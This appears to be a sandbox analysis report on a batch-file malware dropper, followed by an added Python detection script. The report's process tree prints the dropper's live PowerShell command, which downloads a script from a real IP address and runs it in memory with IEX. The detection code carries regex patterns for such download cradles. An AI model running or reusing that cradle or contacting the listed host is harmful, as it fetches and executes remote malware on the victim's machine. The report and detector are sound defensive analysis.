Analysis
- max time kernel: 60s
- max time network: 61s
- platform: windows7_x64
- resource: win7
- submitted: 12-07-2020 19:10

Static task: static1

Behavioral task: behavioral1
- Sample: d8b4df362b6cf1bf526634ea889b42de.bat
- Resource: win7 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: d8b4df362b6cf1bf526634ea889b42de.bat
- Resource: win10v200430 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: d8b4df362b6cf1bf526634ea889b42de.bat
- Size: 213B
- MD5: fa5f98db7255446f6688e03c1b8639e1
- SHA1: 9149b6cdcab524d9e06254b52dcdcb0455cdb7ac
- SHA256: b64c3249144683345453feac5f2c3ed3374d33a8eaf6bf4e30299e55a1bf1fca
- SHA512: e13b67fd455c2e28362529b6cc986135be45d21ad68a8a7b7af6203b4766dce4fe74bd1f8fc16f7de6b09f1b9a787982d4302b2aa26c48c5a6326503b6d3d4a8
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de
Signatures
- Suspicious use of WriteProcessMemory (4 IoCs)
  Process: cmd.exe
  description | pid | process | target process
  PID 1492 wrote to memory of 892 | 1492 | cmd.exe | powershell.exe
  (this row is recorded four times, one per IoC)
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Process: powershell.exe, pid 892
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe, pid 892, Token: SeDebugPrivilege
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Process: powershell.exe, pid 892 (recorded twice)
- Blacklisted process makes network request (1 IoC)
  Process: powershell.exe, pid 892, flow 3
Processes
1. C:\Windows\system32\cmd.exe
   cmd /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"
   - Suspicious use of WriteProcessMemory
   2. C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (child of 1)
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"
      - Suspicious behavior: CmdExeWriteProcessMemorySpam
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
      - Blacklisted process makes network request
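The process tree above is the whole story of this sample: a 213-byte batch file whose only job is to start 32-bit PowerShell, pull a script over plain HTTP, run it in memory with IEX, and then sleep for 10000 seconds so the process stays resident. The following is an added detection example written for this page; it is not part of the sandbox report and not the sample's code. It takes process-creation records in the shape Sysmon Event ID 1 exposes (pid, parent pid, image, command line), flags a powershell.exe launch whose command line contains an IEX plus download cradle, and records the context a triager wants: the cmd.exe parent, the SysWOW64 image path, the contacted URL and the sleep length. The two malicious records are copied from the tree above; cmd.exe's parent pid (0), the benign third record, the field layout and the 3600-second sleep threshold are assumptions made for the example.

```python
"""Flag the cmd.exe -> powershell.exe download-cradle chain in process-creation events."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed process-creation records (Sysmon Event ID 1 shape). The first two
# are taken from the process tree in the report; cmd.exe's parent is not in the
# report, so ppid 0 is an assumption. The third is a made-up benign launch.
EVENTS = [
    {"pid": 1492, "ppid": 0, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": r'cmd /c "C:\Users\Admin\AppData\Local\Temp\d8b4df362b6cf1bf526634ea889b42de.bat"'},
    {"pid": 892, "ppid": 1492, "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'''C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/d8b4df362b6cf1bf526634ea889b42de');Invoke-CFAKWL;Start-Sleep -s 10000"'''},
    {"pid": 2200, "ppid": 2100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\Backup.ps1"},
]

# IEX / Invoke-Expression combined with a network download, in either order.
_DL = r"(?:downloadstring|downloadfile|invoke-webrequest|iwr|invoke-restmethod|irm)"
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\b" + _DL + r"\b|\b" + _DL + r"\b.*\b(?:iex|invoke-expression)\b",
    re.IGNORECASE,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+")
SLEEP_RE = re.compile(r"start-sleep\s+(?:-s(?:econds)?\s+)?(\d+)", re.IGNORECASE)
LONG_SLEEP_SECONDS = 3600  # assumed threshold: a shell parked for an hour or more is worth a look


@dataclass
class Finding:
    pid: int
    parent_pid: int
    image: str
    urls: List[str]
    sleep_seconds: Optional[int]
    reasons: List[str] = field(default_factory=list)


def basename(path: str) -> str:
    """Last path component, lower-cased, so System32 and SysWOW64 copies compare equal."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[Dict]) -> List[Finding]:
    """Return one Finding per powershell.exe launch that carries a download cradle."""
    by_pid = {e["pid"]: e for e in events}
    findings: List[Finding] = []
    for e in events:
        if basename(e["image"]) != "powershell.exe":
            continue
        cmd = e["cmdline"]
        if not CRADLE_RE.search(cmd):
            continue  # the cradle is the trigger; everything below is context for the analyst
        reasons = ["IEX of a downloaded string: remote script executed in memory, nothing written to disk"]
        parent = by_pid.get(e["ppid"])
        if parent and basename(parent["image"]) == "cmd.exe":
            reasons.append("spawned by cmd.exe (batch-file dropper chain)")
        if "\\syswow64\\" in e["image"].lower():
            reasons.append("32-bit PowerShell from SysWOW64 on a 64-bit host")
        m = SLEEP_RE.search(cmd)
        sleep = int(m.group(1)) if m else None
        if sleep is not None and sleep >= LONG_SLEEP_SECONDS:
            reasons.append(f"Start-Sleep of {sleep}s keeps the process resident after the payload runs")
        findings.append(Finding(e["pid"], e["ppid"], e["image"], URL_RE.findall(cmd), sleep, reasons))
    return findings


if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f"pid {f.pid} (parent {f.parent_pid}) {f.image}")
        for url in f.urls:
            print("  url:", url)
        for r in f.reasons:
            print("  -", r)
```

Only the command line from pid 892 trips the rule; the benign `-File` launch is not reported. The extracted URL is the same ps1.dropper address the sandbox lists under Malware Config, which is the value to pivot on for blocking and for searching proxy logs.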
Network
MITRE ATT&CK Matrix
Downloads
-
memory/892-0-0x0000000000000000-mapping.dmp